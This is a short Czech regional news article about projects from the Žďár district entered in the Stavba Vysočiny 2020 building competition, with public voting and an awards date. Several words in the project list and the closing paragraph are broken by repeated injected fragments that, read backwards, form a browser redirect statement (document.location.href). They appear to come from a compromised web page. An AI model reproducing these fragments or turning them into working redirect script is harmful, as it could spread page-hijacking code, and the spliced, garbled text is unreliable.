Rainbow page separator

O titul soutěží obchvat i technické sítě v průmyslové zóně

Pátek, 30. července 2021

Žďársko / Šest z celkem osmnácti loni zrealizovaných projektů ucházejících se o přízeň veřejnosti v soutěži Stavba Vysočiny 2020 je ze žďárského okresu. Hlasovat se dá až do 8. srpna prostřednictvím SMS zpráv, přičemž bližší informace jsou k dispozici na webu www.stavbavysociny.cz.
Žďárský okres v krajské soutěži o nejzajímavější stavbu reprezentují technická infrastruktura v Jamské ulici ve Žďáře nad Sázavou, Dům přírody Žďárských vrchů v Krátké, mateřská školka a tělocvična v Moravci, obchvat Nového Veselí a Budče, pódium v amfiteátru v Bystřici nad Pernštejnem a spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovní hala v Novém Městě na Moravě.
Slavnostní vyhlášení výsledků je naplánováno na 6. září v humpoleckém Divadle Za komínem. Záměrem soutěže Stavba Vysočiny je ocenit nejlepší novostavby a rekonstrukce, podpořit inves[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tory, architekty, projektanty a stavební firmy, ale i prezen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovat architekturu a stavebnictví laické či odborné veřejnosti a zviditelnit skutečnost, že estetická a řemeslná kvalita se vyplácí.